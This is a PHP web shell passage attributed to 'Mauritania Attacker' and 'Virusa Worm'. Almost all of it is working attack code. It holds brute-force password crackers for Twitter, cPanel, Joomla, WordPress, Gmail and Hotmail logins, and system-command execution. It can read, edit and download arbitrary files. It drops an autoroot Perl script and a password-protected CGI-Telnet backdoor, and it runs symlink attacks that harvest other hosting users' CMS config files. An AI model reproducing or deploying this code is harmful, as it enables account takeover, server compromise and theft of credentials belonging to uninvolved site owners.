"; if($_POST['username'] and $_POST['password']){ #function function brute($user,$pass) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://twitter.com/intent/session/"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "authenticity_token=&session[username_or_email]={$user}&session[password]={$pass}&remember_me=1"); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/34.0.1847.116"); #change with your real useragent plz # cURL - Brute Users & Password $login = curl_exec($ch); if(eregi("error notice", $login)){ echo "

[+] : Username : $user  Incorrect Password =====>: $pass

"; }else{ echo "

[+] : [+] CRACKED SUCCESSFULLY [+]Username : $user  GOOD PASSWORD =====>: $pass

"; } } # POSTS $username = explode("\n", $_POST['username']); $password = explode("\n", $_POST['password']); # Foreach Users N' Textarea foreach($username as $users) { $users = @trim($users); foreach($password as $pass) { $pass = @trim($pass); brute($users,$pass); }} # cURL } echo "

Coded By : Mauritania Attacker

"; } if(isset($_GET['action']) && $_GET['action'] == 'cpbru'){ echo '
Skype Brute Force - Cpanel Brute Force - Joomla Brute Force - Wordpress Brute Force - Twitter Brute Force - Gmail & Hotmail Brute Force
'; echo '
Cpanel Brute Force


'; function in($type,$name,$size,$value,$checked=0) { $ret = ""; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1;} ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) { $this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) { $this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) { $this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; } } } if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cccc']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo ''; if(!$sql->connect()) echo "
".$sql->error."
"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "
".$sql->error."
"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
"; switch($sql->query($query)) { case '0': echo "
Error : ".$sql->error."
"; break; case '1': if($sql->get_result()) { echo ""; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode(" "; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode(" '; } echo "
 ", $sql->columns); echo "
 ".$keys." 
 ",$sql->rows[$i]); echo '
 '.$values.' 
"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "
affected rows : ".$ar."

"; break; } } } } } echo "
Cpanel Brute Force recoded By Virusa Worm
"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query'); echo "
"; echo "Base: base."\">
"; echo "


"; echo "
"; echo "
[ BACK ]
"; die(); } function ccmmdd($ccmmdd2,$att) { global $ccmmdd2,$att; echo '


'; if($_POST[att]=='system') { echo ' '; } if($_POST[att]=='passthru') { echo ' '; } if($_POST[att]=='exec') { echo ' '; } if($_POST[att]=='shell_exec') { echo ' '; } echo '
'; exit; } if($_POST['page']=='edit') { $code=@str_replace("\r\n","\n",$_POST['code']); $code=@str_replace('\\','',$code); $fp = fopen($pathclass, 'w'); fwrite($fp,"$code"); fclose($fp); echo "
OK Edit



BACK"; exit; } if($_POST['page']=='show') { $pathclass =$_POST['pathclass']; echo '
'; $sahacker = fopen($pathclass, "rb"); echo '
'.$pathclass.'
'; fclose($sahacker); echo '

'; exit; } if($_POST['page']=='ccmmdd') { echo ccmmdd($ccmmdd2,$att); exit; } if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("\n",$_POST['usernames']); foreach($e as $value){ $k = explode(":",$value); $username .= $k['0']." "; } }elseif($_POST['type'] == 'simple'){ $username = str_replace("\n",' ',$_POST['usernames']); } $a1 = explode(" ",$username); $a2 = explode("\n",$_POST['passwords']); $id2 = count($a2); $ok = 0; foreach($a1 as $user ) { if($user !== '') { $user=trim($user); for($i=0;$i<=$id2;$i++) { $pass = trim($a2[$i]); if(@mysql_connect('localhost',$user,$pass)) { echo "Virusa Worm~ user is ($user) Password is ($pass)
"; $ok++; } } } } echo "
You Found $ok Cpanel by Virusa Worm

"; echo "
BACK"; exit; } } echo '
'; echo ''; } echo '
User :
Pass :
Type : Simple : /etc/passwd :

CMD MYSQL
user pass database
cmd ~

CMD system - passthru - exec - shell_exec
cmd ~

Show File And Edit
Path ~

Info Security
Safe Mode '; $safe_mode = ini_get('safe_mode'); if($safe_mode=='1') { echo 'ON'; }else{ echo 'OFF'; } echo '
Function '; if(''==($func=@ini_get('disable_functions'))) { echo " No Security for Function"; }else{ echo ''; echo '$func'; echo '

'; } if(isset($_GET['action']) && $_GET['action'] == 'jmbru'){ echo '

Skype Brute Force - Cpanel Brute Force - Joomla Brute Force - Wordpress Brute Force - Twitter Brute Force - Gmail & Hotmail Brute Force
'; echo '
Joomla Brute Force

'; echo '

User :

Sites list : Pass list :

'; @set_time_limit(0); if($_POST['x']){ echo "
"; $sites = explode(" ",$_POST["sites"]); // Get Sites $w0rds = explode(" ",$_POST["w0rds"]); // Get w0rdLiSt $Attack = new Joomla_brute_Force(); // Active Class foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D flush();flush(); } } } # Class & Function'z function txt_cln($value){ return str_replace(array(" "," "),"",$value); } class Joomla_brute_Force{ public function check_it($site,$user,$pass){ // print result if(eregi('com_config',$this->post($site,$user,$pass))){ echo "# Success : $user:$pass -> $site/administrator/index.php
"; $f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php "); fclose($f); flush(); }else{ echo "# Failed : $user:$pass -> $site
"; flush();} } public function post($site,$user,$pass){ // Post -> user & pass $token = $this->extract_token($site); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1'); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function extract_token($site){ // get token from source for -> function post $source = $this->get_source($site); preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); return $token[1][0]; } public function get_source($site){ // get source for -> function extract_token $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } } } if(isset($_GET['action']) && $_GET['action'] == 'wpbru'){ echo '
Skype Brute Force - Cpanel Brute Force - Joomla Brute Force - Wordpress Brute Force - Twitter Brute Force - Gmail & Hotmail Brute Force
'; echo '
Wordpress Brute Force

'; echo '

 

Hosts:

Users:

Passwords:

 

'; if ($_POST) { $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if ($passwords && $usernames && $hosts) { $hosts_explode = explode(" ", $hosts); $usernames_explode = explode(" ", $usernames); $passwords_explode = explode(" ", $passwords); foreach ($hosts_explode as $host) { $host = RemoveLastSlash($host); $hacked = 0; $host = str_replace(array("http://", "https://", "www."), "", trim($host)); $host = "http://" . $host; $wpAdmin = $host . '/wp-admin/'; if (!url_exists($host . "/wp-login.php")) { echo "

" . $host . " => Error In Login Page !

"; ob_flush(); flush(); continue; } foreach ($usernames_explode as $username) { foreach ($passwords_explode as $password) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, "log=" . $username . "&pwd=" . $password . "&wp-submit=Giri‏" . "&redirect_to=" . $wpAdmin . "&testcookie=1"); $login = curl_exec($ch); if (eregi("profile.php", $login)) { $hacked = 1; echo "

" . $host . " => UserName : [" . $username . "] : Password : [" . $password . "]

"; ob_flush(); flush(); break; } } if ($hacked == 1) { break; } } if ($hacked == 0) { echo "

" . $host . " => Failed !

"; ob_flush(); flush(); } } } else { echo "

All fields are Required !

"; } } echo '
'; function url_exists($strURL) { $resURL = curl_init(); curl_setopt($resURL, CURLOPT_URL, $strURL); curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1); curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback'); curl_setopt($resURL, CURLOPT_FAILONERROR, 1); curl_exec($resURL); $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE); curl_close($resURL); if ($intReturnCode != 200) { return false; } else { return true; } } function filter($string) { if (get_magic_quotes_gpc() != 0) { return stripslashes($string); } else { return $string; } } function RemoveLastSlash($host) { if (strrpos($host, '/', -1) == strlen($host) - 1) { return substr($host, 0, strrpos($host, '/', -1)); } else { return $host; } } echo "

"; } if(isset($_GET['action']) && $_GET['action'] == 'ghbru'){ echo '
Skype Brute Force - Cpanel Brute Force - Joomla Brute Force - Wordpress Brute Force - Twitter Brute Force - Gmail & Hotmail Brute Force
'; echo '
Gmail & Hotmail Brute Force
'; set_time_limit(0); error_reporting(0); class s1{ private $adres = array( 'gmail' => '{imap.gmail.com:993/imap/ssl}', 'hotmail' => '{pop3.live.com:995/pop3/ssl}' ); private $imap; function __construct($gelen1,$gelen2){ $uname = explode("\r\n",$gelen1); $pwd = explode("\r\n",$gelen2); foreach($pwd as $pass){ $pass = trim($pass); foreach($uname as $user){ $user = trim($user); if(preg_match('@gmail@si',$user)){ $this->baglan($this->adres["gmail"],$user,$pass); }else{ $this->baglan($this->adres["hotmail"],$user,$pass); } } } } public function baglan($url,$user,$pass){ $this->imap = imap_open($url,$user,$pass); if($this->imap){ echo "$user => $pass
"; } } function __destruct(){ imap_close($this->imap); } } echo '



'; if($_POST){ $mails = $_POST["mail"]; $sifre = $_POST["sifre"]; if((isset($mails)) and (isset($sifre))){ $s1 = new s1($mails,$sifre); } } echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'w00ts'){ echo '
Autoroot Generator Coded By Mauritania Attacker

'; echo'
Special Greet To HusseiN98D

'; echo"


"; echo'
'; @error_reporting(0); sleep(2); echo "

Script Autoroot Perl Extracted Successfully.... \!/


"; //generate autoroot script perl mkdir('lulZ',0755); $shellw0rm = ''; $chmoderr = fopen("lulZ/autoroot.pl" ,"w+"); $write = fwrite ($chmoderr ,base64_decode($shellw0rm)); if($write){ echo '

Script Autoroot is here ===> '.getcwd().'/lulZ/autoroot.pl

'; fclose($chmoderr); chmod("lulZ/autoroot.pl",0755); //Extracting htaccess to enable perl handler and type all depends on the server :D $htaccess = 'T3B0aW9ucyBJbmNsdWRlcyBJbmNsdWRlc05PRVhFQyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KDQpBZGRUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtY2dpIC5wbA0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAucGwNCg0KQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5wbA0KQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5wbA=='; $lol = fopen("lulZ/.htaccess" ,"w+"); $dwrite = fwrite ($lol ,base64_decode($htaccess)); fclose($chmoderr); echo '

Back Connect and go to this directory ====> cd '.getcwd().'/lulZ/

'; echo "

Autoroot Command : perl autoroot.pl

"; } } if(isset($_GET['action']) && $_GET['action'] == 'pytcp'){ echo '
Symlink Info - Cms Scanner - Perl based Symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Bypass Forbidden with Python via TCP Protocol

'; echo '

Coded By Mauritania Attacker


'; echo '


View Root Like This ===> example: http://site.com:13123

Default port:13123

If you can launch this command from Back Connect it is more better \!/


Command: python pyProsym.py



'; } if(isset($_GET['action']) && $_GET['action'] == 'cgi4e'){ mkdir('cgi4e', 0755); chdir('cgi4e'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "AddType application/x-httpd-cgi .izo AddType application/x-httpd-cgi .izo AddHandler cgi-script .izo AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgi4e = ''; $file = fopen("cgi4e.izo" ,"w+"); $write = fwrite ($file ,base64_decode($cgi4e)); fclose($file); chmod("cgi4e.izo",0755); echo "
CGI-Telnet Version 1.4
Password : virusa

"; } if(isset($_GET['action']) && $_GET['action'] == 'sym'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Symlink Info

'; if(!is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die (""); } else { echo "
"; foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domvw); flush(); if(strlen(trim($domvw[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0])); flush(); $site = $user['name'] ; @symlink("/","sim/rut"); $site = $domvw[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/",$domvw[1][0]) or preg_match("/.^$il/",$domvw[1][0]) ) { $site = "
".$domvw[1][0]."
"; } echo " "; flush(); flush(); } } } } echo "
DomainsUsersSymlink
".$user['name']."


"; } if(isset($_GET['action']) && $_GET['action'] == 'dose'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Cms Scanner

'; if(!@is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die (""); } else { echo "
"; foreach($d00m as $dom){ flush(); flush(); if(eregi("zone",$dom)){ @preg_match_all('#zone "(.*)"#', $dom, $domvw); flush(); if(@strlen(trim($domvw[1][0])) > 2){ $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0])); $wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp-config.php"; $wpp=@get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/wp-config.php"; $wpp2=@get_headers($wp2); $wp12=$wpp2[0]; $jo1=$pageURL."/sim/rut/home/".$user['name']."/public_html/configuration.php"; $joo=@get_headers($jo1); $jo=$joo[0]; $jo2=$pageURL."/sim/rut/home/".$user['name']."/public_html/joomla/configuration.php"; $joo2=@get_headers($jo2); $jo12=$joo2[0]; $vb1=$pageURL."/sim/rut/home/".$user['name']."/public_html/includes/config.php"; $vbb=@get_headers($vb1); $vb=$vbb[0]; $vb2=$pageURL."/sim/rut/home/".$user['name']."/public_html/vb/includes/config.php"; $vbb2=@get_headers($vb2); $vb12=$vbb2[0]; $vb3=$pageURL."/sim/rut/home/".$user['name']."/public_html/forum/includes/config.php"; $vbb3=@get_headers($vb3); $vb13=$vbb3[0]; $wh1=$pageURL."/sim/rut/home/".$user['name']."public_html/clients/configuration.php"; $whh2= @get_headers($wh1); $wh=$whh2[0]; $wh2=$pageURL."/sim/rut/home/".$user['name']."/public_html/support/configuration.php"; $whh2= @get_headers($wh2); $wh12=$whh2[0]; $wh3=$pageURL."/sim/rut/home/".$user['name']."/public_html/database.php"; $whh3= @get_headers($wh3); $wh13=$whh3[0]; $wh5=$pageURL."/sim/rut/home/".$user['name']."/public_html/config.php"; $whh5= @get_headers($wh5); $wh15=$whh5[0]; $wh4=$pageURL."/sim/rut/home/".$user['name']."/public_html/client/configuration.php"; $whh4= @get_headers($wh4); $wh14=$whh4[0]; $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config=""; } elseif (strpos($wp12, "200") == true) { $config=""; } elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true ) { $config=" "; } elseif (strpos($wh12, "200") == true) { $config =""; } elseif (strpos($wh13, "200") == true) { $config =""; } elseif (strpos($jo, "200") == true) { $config=" "; } elseif (strpos($jo12, "200") == true) { $config=" "; } elseif (strpos($vb, "200") == true) { $config=" "; } elseif (strpos($vb12, "200") == true) { $config=" "; } elseif (strpos($vb13, "200") == true) { $config=" "; } else { continue; } flush(); flush(); $site = $user['name'] ; flush(); echo ""; flush(); } } } } echo "
Domains Script
".$config."


"; } if(isset($_GET['action']) && $_GET['action'] == 'vkill'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Perl based symlink

'; echo '
Extract /etc/passwd


'; if(isset($_POST['passx'])) { echo '


'; } echo '


'; if(isset($_POST['perl'])) { error_reporting(0); $vw=''; $file=(base64_decode($vw)); mkdir('perl', 0777); $hope = fopen("perl/.htaccess", 'w'); $hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .pl\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl"; fwrite ( $hope, $hcon ) ; $pelfile = fopen("perl/vw.pl" ,"w"); fwrite ($pelfile,$file); chmod("perl/vw.pl",0755); echo "

"; echo "check in this directory for configs files

Click Here

"; } echo '


'; if(isset($_POST['ms'])) { error_reporting(0); $cmd="ls /var/named"; $r=shell_exec($cmd); mkdir('conkill',0777); $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f = fopen('conkill/.htaccess','w'); $agshell = symlink("/","conkill/root"); fwrite($f , $rr); echo '




'; } error_reporting(0); $webs=explode("\n",$_POST['web']); if(isset($_POST['w'])) { $webs=explode("\n",$_POST['web']); echo "
"; foreach($webs as $f) { $str=substr_replace($f,"",-4); $user = posix_getpwuid(@fileowner("/etc/valiases/".$str)); echo ""; flush(); } } echo '
DomainsUsersSymlink
".$str."".$user['name']."


'; } if(isset($_GET['action']) && $_GET['action'] == 'file'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Symlink Manual

'; echo'






'; $pfile = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @mkdir('simfel',0777); $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any"; $f =@fopen ('simfel/.htaccess','w'); @fwrite($f , $c); @symlink("$pfile","simfel/$symfile"); echo '
Done.. !
Open this file -> '.$symfile.'
'; } } if(isset($_GET['action']) && $_GET['action'] == 'manu'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Manually Retrieve Config

'; echo "



"; function red(){ $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); if ($stream == FALSE) die("Can't open imap stream"); $str = imap_body($stream, 1); if (!empty($str)) echo "
".$str."
"; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "
";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "
"; imap_close($stream); } } if(strtolower(substr(PHP_OS, 0, 3)) == "win"){ echo '
Sorry, This function does not work on Windows platforms.
'; }else { $slash="/"; $basep=str_replace("\\","/",$basep); } $s=$_SERVER['PHP_SELF']; echo '

SymLink With PHP





SymLink With OS :





'; if ($_POST['mrc1'] && $_POST['mrc2']){ if (symlink($_POST['mrc1'],$_POST['mrc2'])){ echo ""; }else{ echo ""; }} if ($_POST['mrci1'] && $_POST['mrci2']){ if (system('ls -s '.$_POST['mrci1']." ".$_POST['mrci2'])){ echo ""; }else{echo ""; }} } if(isset($_GET['action']) && $_GET['action'] == 'ensim'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Enable Symlink If Disabled

'; echo '


'; error_reporting(0); if(isset($_POST['ens'])) { mkdir('ensim',0755); $rr =' Options All Options +FollowSymLinks Options +SymLinksIfOwnerMatch Options +ExecCGI AllowOverride AuthConfig FileInfo Indexes Limit Options=Includes,Includes,Indexes,MultiViews,SymLinksIfOwnerMatch '; $g = fopen('ensim/.htaccess','w'); fwrite($g,$rr); echo "

Symlink Function Enabled Successfully in apache pre main conf
"; } } if(isset($_GET['action']) && $_GET['action'] == 'maiilllerrr'){ echo '
Mailer - Everything You Need - Paypal Checker - Email Extractor
'; echo '
Spam Mailer

